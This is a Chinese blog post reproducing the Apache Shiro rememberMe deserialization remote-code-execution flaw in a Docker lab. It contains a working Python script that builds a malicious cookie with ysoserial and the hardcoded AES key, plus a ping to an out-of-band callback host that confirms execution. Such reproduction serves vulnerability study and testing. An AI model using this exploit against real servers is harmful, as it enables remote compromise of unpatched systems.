Shiro框架漏洞

最新推荐文章于 2024-05-16 23:23:17 发布
最新推荐文章于 2024-05-16 23:23:17 发布
阅读量826 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/110952178
版权

漏洞简述

Shiro默认使用了CookieRememberMeManager, 其处理cookie的流程是: 得到rememberMe的cookie值–>Base64解码–>AES解密–>反序列化.然而AES的密钥是硬编码的, 密钥泄漏的根本原因是开发人员在开发过程中部分代码直接使用了网上的一些开源的项目代码,就导致了攻击者可以构造恶意数据造成反序列化的RCE漏洞。

影响版本Apache Shiro <= 1.2.4

Docker容器
环境搭建

docker pull medicean/vulapps:s_shiro_1
>docker run -d -p 8081:8080 medicean/vulapps:s_shiro_1
>docker exec -it ID /bin/bash

访问http://192.168.213.128:8081/login.jsp

在这里插入图片描述

到此Shiro环境已经搭建好

漏洞复现
登录页面输入账户密码抓包,回包发现Shiro标志。

在这里插入图片描述
(1)使用脚本生成payload.cookie

import sys
import base64
import uuid
from random import Random
import subprocess
from Crypto.Cipher import AES

def encode_rememberme(command):
    popen = subprocess.Popen(['java', '-jar', 'ysoserial.jar路径', 'CommonsCollections2', command], stdout=subprocess.PIPE)
    BS   = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key  =  "kPH+bIxk5D2deZiIxcaaaA=="
    mode =  AES.MODE_CBC
    iv   =  uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    file_body = pad(popen.stdout.read())
    base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))
    return base64_ciphertext

if __name__ == '__main__':
    payload = encode_rememberme(sys.argv[1])    
    with open("新建payload.cookie路径", "w") as fpw:
        print("rememberMe={}".format(payload.decode()), file=fpw)

执行脚本,生成payload文件

python3 python脚本路径 "ping xxxx.ceye.io"

登录进去并抓包,替换cookie值

在这里插入图片描述
在这里插入图片描述

查看ceye平台

在这里插入图片描述

漏洞存在

(2)使用工具ShiroExploit.V2.51
在这里插入图片描述

per_se_veran_ce
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Shiro反序列化漏洞检测工具
01-05
Shiro框架中,这个漏洞主要存在于其会话管理组件,特别是当使用默认的`DefaultSessionManager`和`DefaultSessionDAO`时,它们可能受到反序列化攻击的影响。 `ShiroExploit-Deprecated-2.51.zip`和`ShiroExploit.V...
Shiro框架政和
07-18
"Shiro框架政和"可能是某个项目或教程,旨在帮助开发者更好地理解和集成Shiro与Spring框架。下面将详细讨论Shiro与Spring的整合以及相关知识点。 1. **Shiro基础概念**: - **身份验证(Authentication)**:确认...
Apache shiro 漏洞总结
星落的博客
08-01 4581
Apache shiro 漏洞总结 Apache shiro是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、密码和会话管理。
Shiro框架漏洞详解及复现
m0_64481831的博客
03-07 1994
Shiro是Apache的一个强大且易用的Java安全框架,用于执行身份验证、授权、密码和会话管理。借助Shiro易于理解的API,用户可以快速轻松地保护任何应用程序----从最小的移动应用程序到最大的web和企业应用程序。Shiro是一个Java的安全框架,用于执行身份验证、授权、密码和会话验证。
shiro漏洞浅探
最新发布
2301_82000839的博客
05-16 1014
CVE-2020-11989 的修复补丁存在缺陷,在 1.5.3 及其之前的版本,由于 shiro 在处理 url 时与 spring 仍然存在差异,依然存在身份校验绕过漏洞由于处理身份验证请求时出错,远程攻击者可以发送特制的 HTTP 请求,绕过身份验证过程并获得对应用程序的未授权访问。该漏洞产生的原因主要是shiro层在处理url上和spring上存在差异,主要是在处理;上的问题,通过构造含有;符号的url即可绕过shiro在权限上的处理,而spring不负责权限管控,所以最终会导致权限绕过。ant。
Shiro框架漏洞总结
zhuyi666的博客
03-23 7983
Apache Shiro是一个强大且易用的Java安全框架,能够用于身份验证、授权、加密和会话管理。只要rememberMe的AES加密密钥泄露,无论shiro是什么版本都会导致反序列化漏洞Shiro拥有易于理解的API,您可以快速、轻松地获得任何应用程序——从最小的移动应用程序到最大的网络和企业应用程序。
Shiro框架漏洞分析与复现
未完成的歌~的博客
05-15 4007
Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性,可以快速轻松地保护任何应用程序——从最小的移动应用程序到最大的 Web 和企业应用程序。
shiro1.7.1全包修补漏洞.rar
07-18
Apache Shiro是一个强大的Java安全框架,它为应用程序提供了身份验证、授权、会话管理和加密服务。这个"shiro1.7.1全包修补漏洞.rar"文件包含了针对Apache Shiro 1.7.1版本的一些安全修复和更新,旨在解决可能存在的...
shiro反序列化漏洞检测工具,含链接教程
08-17
Shiro框架中,当不安全地处理来自不可信源的反序列化数据时,就可能导致这种漏洞。例如,如果一个应用程序允许用户提交包含序列化对象的数据,而这些对象在Shiro的内部逻辑中被反序列化,那么攻击者可能构造恶意的...
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
Apache Shiro 是一个强大且易用的 Java 安全框架,提供身份认证、授权、加密以及会话管理功能,简化了应用安全的实现。在提到的 "shiro_attack_by J1anfen" 工具中,重点是针对 Apache Shiro 的一个特定安全问题:...
shiro反序列化漏洞
m0_63645854的博客
06-13 607
本文主要介绍了shiro反序列化漏洞的原理,影响版本以及防御方式
shiro组件漏洞分析(一)
why811的博客
09-13 183
官方issues:https://issues.apache.org/jira/browse/SHIRO-550Apache Shiro框架提供了记住我(RememberMe)的功能,功能表现为关闭浏览器再次访问时无需再登录即可访问。shiro默认使用CookieRememberMeManager,对rememberMe的cookie做了加密处理,在CookieRememberMeManaer类中将cookie中rememberMe字段内容先后进行序列化、AES加密、Base64编码操作。
框架、组件漏洞系列4:Apache shiro漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-14 3722
一、Apache Shiro 简介 1、什么是shiro Apache Shiro提供了认证、授权、加密和会话管理功能,将复杂的问题隐藏起来,提供清晰直观的API使开发者可以很轻松地开发自己的程序安全代码。并且在实现此目标时无须依赖第三方的框架、容器或服务,当然也能做到与这些环境的整合,使其在任何环境下都可拿来使用Shiro将目标集中于Shiro开发团队所称的“四大安全基石”-认证(Authentication)、授权(Authorization)、会话管理(Session Management)和加.
Apache Shiro系列漏洞利用以及实战总结
web17886480312的博客
09-01 755
Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro的易于理解的API,可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序。内置了可以连接大量安全数据源(又名目录)的Realm,如LDAP、关系数据库(JDBC)、类似INI的文本配置资源以及属性文件等。...
shiro框架漏洞实战网站
05-05
如果您想学习 Shiro 框架漏洞实战,可以尝试以下网站: 1. Shiro-721:https://github.com/wh1t3p1g/Shiro721 2. Shiro550:https://github.com/codeplutos/Shiro550 3. Shiro550-Realm:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值